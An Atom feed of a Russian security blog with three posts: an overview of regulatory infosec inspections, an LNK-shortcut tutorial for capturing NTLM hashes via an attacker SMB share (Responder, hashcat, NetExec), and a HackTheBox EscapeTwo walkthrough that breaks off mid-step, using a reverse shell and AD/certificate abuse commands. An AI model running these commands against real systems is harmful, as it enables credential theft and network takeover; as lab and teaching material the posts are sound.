<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>Black_Maus</title><author><name>Black_Maus</name></author><id>https://teletype.in/atom/black_maus</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/black_maus?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@black_maus?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=black_maus"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/black_maus?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-22T07:49:25.681Z</updated><entry><id>black_maus:z1hOSSELUk-</id><link rel="alternate" type="text/html" href="https://teletype.in/@black_maus/z1hOSSELUk-?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=black_maus"></link><title>Проверка контролирующих органов по ИБ</title><published>2025-06-26T14:36:57.088Z</published><updated>2025-06-26T14:36:57.088Z</updated><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/c3/5b/c35b6ff2-c329-4f60-8d54-990126fa4c1a.png&quot;&gt;Проверка - какая она? Многие задаются вопросом о том, что из себя представляет проверка контролирующих органов по информационной безопасности. Некоторые думают, что это очередная &quot;палка&quot; для органа, другие думают что посмотрят только документы и всё. На самом деле такие проверки являются комплексными и несут в себе полный аудит всей организации. Многие боятся таких проверок и очень зря, ведь некоторые компании готовы за такие проверки выложить круглую сумму.</summary><content type="html">
  &lt;p id=&quot;lBkc&quot;&gt;Проверка - какая она? Многие задаются вопросом о том, что из себя представляет проверка контролирующих органов по информационной безопасности. Некоторые думают, что это очередная &amp;quot;палка&amp;quot; для органа, другие думают что посмотрят только документы и всё. На самом деле такие проверки являются комплексными и несут в себе полный аудит всей организации. Многие боятся таких проверок и очень зря, ведь некоторые компании готовы за такие проверки выложить круглую сумму. &lt;/p&gt;
  &lt;p id=&quot;PotW&quot;&gt;Стоит понимать, что после проверок именно органами тоже есть плата, однако она эфемерная, и финансы будут потрачены исключительно на повышение уровня информационной безопасности, так как орган после проверки дает рекомендации к устранению со сроками.&lt;/p&gt;
  &lt;p id=&quot;nRZt&quot;&gt;Итак, что же это за проверки такие? Ответ на самом деле очень прост, в первую очередь идет проверка разработанных документов в организации, касаемые информационной безопасности. Все эти 187-ФЗ, 152-ФЗ, Указ Президента 250, ФСБ, ФСТЭК и т.д. &lt;/p&gt;
  &lt;p id=&quot;HA5X&quot;&gt;Далее идет проверка внутреннего нарушителя или по-другому внутренний пентест. На этом этапе происходит попытка захвата Active Directory, в также различных информационных систем, которые имеют для организации значимость. Например, Kaspersky Security Center, SIEM, ядро сети, происходит попытка получения администраторского доступа к различным информационным системам персональных данных, даже если они не принадлежат организации. Тут же происходит сканирование всех хостов в помощью MaxPatrol.&lt;/p&gt;
  &lt;p id=&quot;TgVG&quot;&gt;Затем происходит тестирование внешних ресурсов на предмет проникновения в локальную сеть организации. На этом этапе как раз используются все возможности веб-пентеста, различные Nuclei, Acunetix, а также использование всех возможностей BurpSuite. &lt;/p&gt;
  &lt;p id=&quot;6qQK&quot;&gt;Далее, происходит проверка хостов на предмет исполнения организацией своих собственных разработанных документов по ИБ. В основном тут идет обход нескольких компьютеров с целью определить, как работают пользователи, имеются ли антивирусы, их настройки, не хранятся ли пароли в открытом виде на рабочем столе.&lt;/p&gt;
  &lt;p id=&quot;6AGl&quot;&gt;И в конце, происходит замер сигналов Wi-Fi на территории организации с целью найти нелегитимные точки доступа а также попытка перехвата хендшейка. В целом на этом этапе нет каких-то требований, но наличие точки доступа в сеть организации может стать уязвимой точкой входа для различных злоумышленников.&lt;/p&gt;
  &lt;p id=&quot;Ezl5&quot;&gt;Вот и все основные этапы проведения проверки. По итогу мероприятий выдается документ с описанием рекомендаций, которые необходимо будет исполнить.&lt;/p&gt;

</content></entry><entry><id>black_maus:ZA7hziM_z0y</id><link rel="alternate" type="text/html" href="https://teletype.in/@black_maus/ZA7hziM_z0y?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=black_maus"></link><title>Атака через LNK-файл</title><published>2025-03-09T19:58:17.172Z</published><updated>2025-03-09T19:58:17.172Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/de/e4/dee449d4-2b8e-4ff3-97a7-49fdbf0fc028.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/cf/75/cf75f91e-45ed-4dc8-bc13-321a0ebcbd06.png&quot;&gt;Атака через LNK-файл использует вредоносные ярлыки Windows для выполнения команд, перехвата учетных данных или доставки вредоносного кода. В статье подробно рассмотрены этапы атаки: создание LNK-файла, использование Responder для захвата NTLM-хэшей и применение NetExec для удаленного выполнения команд. Также описаны меры защиты, предотвращающие данный вид атак.</summary><content type="html">
  &lt;p id=&quot;tXP6&quot;&gt;❗ Данный материал предоставлен исключительно в образовательных целях. Использование этих техник в незаконных целях является нарушением закона!&lt;/p&gt;
  &lt;p id=&quot;utvB&quot;&gt;Атака с использованием &lt;strong&gt;LNK-файла&lt;/strong&gt; (ярлыка Windows) задействует вредоносные ярлыки Windows для выполнения команд, доставки полезной нагрузки или захвата учетных данных жертвы. Когда жертва открывает &lt;strong&gt;LNK-файл&lt;/strong&gt;, он может автоматически инициировать подключение к серверу атакующего или выполнить опасный код.  &lt;/p&gt;
  &lt;p id=&quot;SpMH&quot;&gt;---&lt;/p&gt;
  &lt;h3 id=&quot;FljQ&quot;&gt;Этапы атаки через LNK-файл&lt;/h3&gt;
  &lt;p id=&quot;AVYG&quot;&gt;&lt;strong&gt;Шаг 1: Создание вредоносного LNK-файла&lt;/strong&gt;&lt;br /&gt;Злоумышленник создаёт LNK-файл, который ссылается на сетевой ресурс, находящийся под его контролем. Этот файл может скрывать вызов SMB- или WebDAV-запроса, что позволяет атакующему перехватить хэши учетных данных жертвы.  &lt;/p&gt;
  &lt;pre id=&quot;HsJx&quot;&gt;$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut(&amp;quot;C:\test.lnk&amp;quot;)
$lnk.TargetPath = &amp;quot;\\192.168.92.132\~test.png&amp;quot; # Указание на сетевой ресурс злоумышленника
$lnk.WindowStyle = 1 # Установка обычного стиля окна
$lnk.IconLocation = &amp;quot;%windir%\system32\shell32.dll, 3&amp;quot; # Назначение значка ярлыка
$lnk.Description = &amp;quot;Test&amp;quot; # Описательный текст для сочетания клавиш
$lnk.HotKey = &amp;quot;Ctrl+Alt+T&amp;quot; # Установка хоткея для сочетания клавиш
$lnk.Save() # Сохранение LNK-файла&lt;/pre&gt;
  &lt;p id=&quot;wujp&quot;&gt;&lt;/p&gt;
  &lt;p id=&quot;sy8V&quot;&gt;- &lt;strong&gt;New-Object -ComObject WScript.shell&lt;/strong&gt; — создаёт объект для взаимодействия с Windows Shell.  &lt;br /&gt;- &lt;strong&gt;CreateShortcut(&amp;quot;C:\test.lnk&amp;quot;) &lt;/strong&gt;— создаёт LNK-файл по указанному пути.  &lt;br /&gt;- &lt;strong&gt;TargetPath = &amp;quot;\\192.168.92.132\~test.png&amp;quot;&lt;/strong&gt; — указывает путь к сетевому ресурсу атакующего.  &lt;/p&gt;
  &lt;p id=&quot;nw6j&quot;&gt;Другие параметры, такие как &lt;code&gt;WindowStyle&lt;/code&gt;, &lt;code&gt;IconLocation&lt;/code&gt; и &lt;code&gt;HotKey&lt;/code&gt;, являются косметическими настройками, которые делают ярлык похожим на легитимный.&lt;/p&gt;
  &lt;figure id=&quot;t6RZ&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e5/4c/e54c2e43-f7c3-4718-8204-76c530b29d22.png&quot; width=&quot;720&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;P7EE&quot;&gt;&lt;strong&gt;Шаг 2: Проверка существования вредоносного файла&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;7zbD&quot;&gt;После создания LNK-файла перейдите в папку, где он был создан. На машине атакующего с Kali проверьте папку &lt;strong&gt;HYDRA-DC&lt;/strong&gt;.&lt;/p&gt;
  &lt;figure id=&quot;6i70&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/12/20/1220574e-5641-4a96-af5d-2f6ee2858ea6.png&quot; width=&quot;720&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;msN3&quot;&gt;Затем откройте папку &lt;strong&gt;hackme&lt;/strong&gt;, чтобы убедиться, что файл &lt;strong&gt;~test.png&lt;/strong&gt; существует. Этот файл будет передан жертве при открытии LNK-файла. Как жертва взаимодействует с файлом **~test.&lt;/p&gt;
  &lt;figure id=&quot;yRGk&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/67/50/675036f6-1e5f-4424-aac3-fda342e9c241.png&quot; width=&quot;720&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;YRiy&quot;&gt;&lt;strong&gt;Шаг 3: Запуск Responder для перехвата хэшей&lt;/strong&gt;  &lt;/h3&gt;
  &lt;p id=&quot;BiiS&quot;&gt;Responder — это инструмент, который перехватывает NTLM-хэши учетных записей, когда жертва пытается аутентифицироваться через SMB или WebDAV.  &lt;/p&gt;
  &lt;p id=&quot;q4xh&quot;&gt;Запуск Responder на Kali:&lt;br /&gt;&lt;/p&gt;
  &lt;p id=&quot;eXW5&quot;&gt;&lt;code&gt;sudo responder -I eth0 -dp&lt;/code&gt;&lt;br /&gt;- &amp;#x60;-I eth0&amp;#x60; — указывает сетевой интерфейс для прослушивания.  &lt;br /&gt;- &amp;#x60;-dp&amp;#x60; — активирует перехват SMB- и DNS-запросов.  &lt;/p&gt;
  &lt;p id=&quot;SoVY&quot;&gt;Когда жертва открывает вредоносный LNK-файл, система автоматически отправляет SMB-запрос, и **Responder** перехватывает NTLM-хэш учетных данных.  &lt;/p&gt;
  &lt;figure id=&quot;4trq&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a7/0d/a70d7d17-f6c2-46df-9d99-b1f0e42bd72a.png&quot; width=&quot;720&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;bzZA&quot;&gt;Более детализированный режим работы:&lt;br /&gt;&lt;br /&gt;&lt;code&gt;sudo responder -I eth0 -dpV&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;- &amp;#x60;-V&amp;#x60; — активирует подробный вывод захваченных данных.  &lt;/p&gt;
  &lt;p id=&quot;q6Ta&quot;&gt;&lt;/p&gt;
  &lt;figure id=&quot;yBxE&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f8/40/f8404ab1-cdf1-4bc5-bc4e-1aabb27c87b8.png&quot; width=&quot;720&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;a8Ma&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/01/3d/013d6790-2404-4246-a49c-fd15e5a25738.png&quot; width=&quot;720&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;AtjU&quot;&gt;&lt;strong&gt;Шаг 4: Анализ перехваченных хэшей&lt;/strong&gt;  &lt;/p&gt;
  &lt;p id=&quot;0MSF&quot;&gt;Проверяя вывод Responder, атакующий может увидеть захваченные NTLM-хэши и использовать их для последующего взлома пароля с помощью таких инструментов, как Hashcat или **John the Ripper.  &lt;/p&gt;
  &lt;p id=&quot;yC5v&quot;&gt;Пример атаки на хэши с помощью Hashcat:&lt;br /&gt;&lt;br /&gt;&lt;code&gt;hashcat -m 5600 captured_hashes.txt rockyou.txt --force&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;- &amp;#x60;-m 5600&amp;#x60; — указывает NTLMv2-хэши.  &lt;br /&gt;- &amp;#x60;rockyou.txt&amp;#x60; — словарь паролей.  &lt;/p&gt;
  &lt;p id=&quot;fT1f&quot;&gt;&lt;/p&gt;
  &lt;h3 id=&quot;0o3d&quot;&gt;&lt;strong&gt;Шаг 5: Использование NetExec для выполнения команд&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;Vpjf&quot;&gt;NetExec — инструмент, аналогичный CrackMapExec, который позволяет атакующему удалённо выполнять команды на машине жертвы.  &lt;/p&gt;
  &lt;p id=&quot;rQ1X&quot;&gt;Пример выполнения команды через NetExec:&lt;br /&gt;&lt;br /&gt;&lt;code&gt;netexec smb 192.168.92.128 -d marvel.local -u fcastle -p Password1 -M slinky -o NAME=test SERVER=192.168.92.129&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;- &amp;#x60;192.168.92.128&amp;#x60; — IP-адрес жертвы.  &lt;br /&gt;- &amp;#x60;-d marvel.local&amp;#x60; — домен цели.  &lt;br /&gt;- &amp;#x60;-u fcastle -p Password1&amp;#x60; — учетные данные.  &lt;br /&gt;- &amp;#x60;-M slinky&amp;#x60; — указывает вредоносный модуль.  &lt;br /&gt;- &amp;#x60;-o NAME=test SERVER=192.168.92.129&amp;#x60; — передача параметров в модуль **slinky**.  &lt;/p&gt;
  &lt;p id=&quot;pjt0&quot;&gt;Если команда выполнена успешно, атакующий может продолжить эксплуатацию системы жертвы или выполнить эксфильтрацию данных.  &lt;/p&gt;
  &lt;figure id=&quot;cx76&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/45/11/4511f50e-b03b-48ff-a3df-748d3b176164.png&quot; width=&quot;720&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;dBCT&quot;&gt;Вывод &lt;/h3&gt;
  &lt;p id=&quot;09Qq&quot;&gt;Атака через LNK-файл — эффективный метод компрометации системы, который часто используется для:  &lt;br /&gt;✅ Захвата NTLM-хэшей учетных данных.  &lt;br /&gt;✅ Доставки вредоносного кода.  &lt;br /&gt;✅ Удалённого выполнения команд на машине жертвы.  &lt;/p&gt;
  &lt;p id=&quot;CIeG&quot;&gt;⚠️ Меры защиты:&lt;br /&gt;- Отключение SMBv1 и ограничение аутентификации по NTLM.  &lt;br /&gt;- Предотвращение автоматического открытия ярлыков из ненадежных источников.  &lt;br /&gt;- Использование сетевых фильтров и мониторинг подозрительных активностей.  &lt;br /&gt;- Жёсткое администрирование групповых политик (GPO) для блокировки выполнения неизвестных ярлыков.  &lt;/p&gt;

</content></entry><entry><id>black_maus:jn7VBGsRQKd</id><link rel="alternate" type="text/html" href="https://teletype.in/@black_maus/jn7VBGsRQKd?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=black_maus"></link><title>EscapeTwo</title><published>2025-01-16T15:33:00.823Z</published><updated>2025-01-16T15:33:00.823Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/58/b4/58b483c0-ef8a-4ff5-b613-4f25462da901.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/96/a5/96a5ef93-2bbd-4d98-b79a-dd8d2a0c3a13.png&quot;&gt;Проходим Season 7 HackTheBox, Машина EscapeTwo</summary><content type="html">
  &lt;p id=&quot;UXTG&quot;&gt;В текущей задаче нам уже дают креды &lt;code&gt;rose/KxEPkKe6R8su&lt;/code&gt;&lt;br /&gt;Но мы все равно запускаем nmap&lt;br /&gt;Для начала добавляем в hosts&lt;/p&gt;
  &lt;p id=&quot;KXsL&quot;&gt;&lt;br /&gt;&lt;code&gt;echo &amp;#x27;10.10.11.51 escapetwo.htb&amp;#x27; | sudo tee -a /etc/hosts&lt;/code&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;pre id=&quot;zwmY&quot;&gt;┌─[maus@parrot]─[~]
└──╼ $nmap -sC -sV -Pn 10.10.11.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 01:07 EST
Nmap scan report for EscapeTwo.htb (10.10.11.51)
Host is up (0.11s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-16 06:07:40Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-16T06:09:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&amp;lt;unsupported&amp;gt;, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-16T06:09:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&amp;lt;unsupported&amp;gt;, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-01-16T06:09:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-16T04:02:53
|_Not valid after:  2055-01-16T04:02:53
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&amp;lt;unsupported&amp;gt;, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-16T06:09:01+00:00; 0s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-16T06:09:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&amp;lt;unsupported&amp;gt;, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-16T06:08:24
|_  start_date: N/A&lt;/pre&gt;
  &lt;p id=&quot;8M9B&quot;&gt;&lt;/p&gt;
  &lt;p id=&quot;GPM1&quot;&gt;В выводе nmap мы видим, что есть домен sequel.htb и контроллер домена DC01.sequel.htb&lt;br /&gt;На всякий случай прописываем и их в hosts&lt;/p&gt;
  &lt;pre id=&quot;pgZR&quot;&gt;echo &amp;#x27;10.10.11.51 &amp;#x27;DC01.sequel.htb&amp;#x27; | sudo tee -a /etc/hosts &amp;amp;&amp;amp; echo &amp;#x27;sequel.htb&amp;#x27; | sudo tee -a /etc/hosts&lt;/pre&gt;
  &lt;p id=&quot;YdLP&quot;&gt;&lt;/p&gt;
  &lt;p id=&quot;YLWL&quot;&gt;В выводе nmap также видим, что открыт 445 порт, а значит можно попробовать smbmap&lt;/p&gt;
  &lt;figure id=&quot;vgI0&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4c/6b/4c6b93ea-e9e5-4050-a2ba-2343bdfbd270.png&quot; width=&quot;992&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ePyY&quot;&gt;Ага, удачная аутентификация, а значит можно подключаться через smbclient&lt;/p&gt;
  &lt;figure id=&quot;3r3Q&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/72/d3/72d39a9a-91ef-4637-90a1-8a4c9c7788b8.png&quot; width=&quot;817&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ITZC&quot;&gt;Изучаем доступные каталоги и видим, что в каталоге &lt;code&gt;Accounting Department&lt;/code&gt; имеются файлы, которые потенциально интересны. Скачиваем их через &lt;code&gt;get&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;ATeT&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7c/65/7c65a0bb-789d-4a8b-9995-d24ca0459895.png&quot; width=&quot;991&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;utLl&quot;&gt;Если мы попытаемся их открыть, то особо ничего не получится (по крайней мере у меня не вышло), но мы знаем что расширение xlsx это по сути архив, поэтому смело распаковываем через &lt;code&gt;unzip&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;WTH6&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d0/11/d011e453-57d5-46e6-91bc-bd1a959ce37b.png&quot; width=&quot;539&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;1hQs&quot;&gt;Нам распакуется файл &lt;code&gt;sharedStrings.xml&lt;/code&gt; в которой будут логины и пароли с SQL, а также админ SQL&lt;/p&gt;
  &lt;figure id=&quot;CIo7&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/60/31/60313ebc-e7d0-48c4-8a78-ea4382e0b9d6.png&quot; width=&quot;1055&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;h80I&quot;&gt;Получаем пароль и подключаемся&lt;/p&gt;
  &lt;figure id=&quot;Up9F&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/99/bc/99bcb770-b2aa-459e-a170-7ad0898e01a4.png&quot; width=&quot;766&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;x0bo&quot;&gt;После того как подключились, нужно прокинуть шелл для простоты работы&lt;/p&gt;
  &lt;p id=&quot;Qtbo&quot;&gt;Включаем для начала &lt;code&gt;enable_xp_cmdshell&lt;/code&gt; и выбираем powershell в base64, шелл можно сделать на сайте revshells.com. Не забываем у себя открыть &lt;code&gt;nc -nlvp 3344&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;jVkU&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f5/e0/f5e01066-50c0-4edf-9180-e78fe16d9caa.png&quot; width=&quot;601&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;4GQc&quot;&gt;Итак, после появления шелла изучаем систему. Видим, что в пользователях есть некий &lt;code&gt;ryan&lt;/code&gt; &lt;s&gt;Гослинг&lt;/s&gt;&lt;/p&gt;
  &lt;figure id=&quot;sVBa&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/02/10/0210daf7-fdd4-4294-b8f6-459db1dd98ed.png&quot; width=&quot;669&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;1S5S&quot;&gt;Смотрим дальше, нам нужно что-то, что даст нам хотя бы намеки на другие креды.&lt;br /&gt;На диске C видим интересную папку SQL2019, а внутри файл конфигурации и кредами в открытом виде.&lt;/p&gt;
  &lt;figure id=&quot;fSB3&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5b/35/5b35259b-6357-465c-8f38-8c162f1b4e32.png&quot; width=&quot;778&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;eqz6&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/05/c6/05c6ab96-3026-4065-89e5-4bfbd8dc92c7.png&quot; width=&quot;766&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;D7R2&quot;&gt;Мы же помним, что нашли какого-то Райана, а тут и пароль какой-то интересный. Проверяем в netexec на валидность&lt;/p&gt;
  &lt;p id=&quot;HdUm&quot;&gt;&lt;/p&gt;
  &lt;figure id=&quot;zMNo&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/0b/d1/0bd15f4b-a032-4985-a04c-d7f0851bbe5e.png&quot; width=&quot;983&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;0u2t&quot;&gt;Опа, вот это поворот. Не теряя времени подключаемся evil-winrm&lt;/p&gt;
  &lt;figure id=&quot;T74M&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/87/66/8766a725-3fb0-4029-ae9a-c8031a770bd1.png&quot; width=&quot;711&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;oNV9&quot;&gt;Лутаем флаг юзера, и переходим к руту.&lt;/p&gt;
  &lt;p id=&quot;SqZ9&quot;&gt;Проверяем сетевые конфиги&lt;/p&gt;
  &lt;figure id=&quot;ElmQ&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2c/22/2c221d3b-80d4-4ef3-8ec4-67168eb62ad9.png&quot; width=&quot;489&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;jJ9G&quot;&gt;Добавляем в hosts Sequel.htb и dc01.seqeul.htb&lt;/p&gt;
  &lt;p id=&quot;VGzU&quot;&gt;Так как это DC, попробуем проанализировать его через bloodhound&lt;/p&gt;
  &lt;pre id=&quot;abIc&quot;&gt;bloodhound-python -u ryan -p &amp;quot;WqSZAFXXXXXXXX&amp;quot; -d sequel.htb -ns 10.10.xx.xx -c All
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.sequel.htb
INFO: Done in 00M 16S&lt;/pre&gt;
  &lt;figure id=&quot;mL4e&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a1/5f/a15fca2e-6249-4c82-896f-4bbeec8a3396.png&quot; width=&quot;1272&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;gRbF&quot;&gt;Видим, что у Райана есть разрешение &lt;code&gt;WriteOwner&lt;/code&gt; на &lt;code&gt;CA_SVC&lt;/code&gt;, а это эмитент сертификата. Значит мы можем назначить Райана владельцем SA_SVC&lt;/p&gt;
  &lt;p id=&quot;TFz2&quot;&gt;Устанавливаем владельца&lt;/p&gt;
  &lt;pre id=&quot;VkT2&quot;&gt;bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 set owner ca_svc ryan&lt;/pre&gt;
  &lt;p id=&quot;pJhc&quot;&gt;Получаем права управления&lt;/p&gt;
  &lt;pre id=&quot;QHX8&quot;&gt;dacledit.py -action &amp;#x27;write&amp;#x27; -rights &amp;#x27;FullControl&amp;#x27; -principal &amp;#x27;ryan&amp;#x27; -target &amp;#x27;ca_svc&amp;#x27; &amp;#x27;10.10.11.51&amp;#x27;/&amp;#x27;ryan&amp;#x27;:&amp;#x27;WqSZAF6CysDQbGb3&amp;#x27;&lt;/pre&gt;
  &lt;p id=&quot;ruHe&quot;&gt;Получаем shadow креды и NTHash&lt;/p&gt;
  &lt;pre id=&quot;RZvp&quot;&gt;certipy shadow auto -u ryan@sequel.htb -p &amp;#x27;WqSZAF6CysDQbGb3&amp;#x27; -dc-ip 10.10.11.51 -ns 10.10.11.51 -target 10.10.11.51 -account ca_svc&lt;/pre&gt;
  &lt;p id=&quot;JlcT&quot;&gt;Если возникает ошибка, установите время как на сервере через ntpdate&lt;/p&gt;
  &lt;p id=&quot;PW5w&quot;&gt;Через Certyfi нужно узнать имя объекта&lt;/p&gt;
  &lt;pre id=&quot;G1UG&quot;&gt;*Evil-WinRM* PS C:\temp&amp;gt; ./Certify.exe find /domain:sequel.htb&lt;/pre&gt;
  &lt;figure id=&quot;zmVb&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f2/9a/f29aef7a-c236-46d3-9073-0d5cdb13c9ca.png&quot; width=&quot;1171&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;uoqN&quot;&gt;**ИЛИ**&lt;/p&gt;
  &lt;pre id=&quot;2nVd&quot;&gt;KRB5CCNAME=$PWD/ca_svc.ccache certipy find -scheme ldap -k -debug -target DC01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout&lt;/pre&gt;
  &lt;figure id=&quot;piC0&quot; class=&quot;m_original&quot;&gt;
